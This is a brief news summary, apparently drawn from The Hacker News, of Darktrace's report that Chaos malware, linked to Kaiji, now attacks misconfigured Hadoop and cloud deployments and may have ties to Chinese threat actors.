"Chaos malware is increasingly targeting misconfigured cloud deployments, expanding beyond its traditional focus on routers and edge devices, according to Darktrace's report."
"The malware is assessed to be an evolution of another DDoS malware known as Kaiji that has singled out misconfigured Docker instances."
"In the attack spotted by Darktrace, the intrusion commenced with an HTTP request to the Hadoop deployment to create a new application, which embedded shell commands to retrieve a Chaos agent binary."
"The domain used in the attack was previously associated with an email phishing campaign by the Chinese cybercrime group Silver Fox, indicating a potential link to Chinese threat actors."
Chaos malware has evolved to target misconfigured cloud deployments, moving beyond its initial focus on routers and edge devices. First documented in September 2022, it operates across Windows and Linux environments, executing remote shell commands, dropping modules, and launching DDoS attacks. The malware is linked to a previous variant known as Kaiji, which targeted misconfigured Docker instances. Evidence suggests a possible connection to Chinese threat actors, as indicated by the use of Chinese language characters and infrastructure. Darktrace identified this variant in a honeypot network, showcasing its capabilities in exploiting vulnerabilities.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]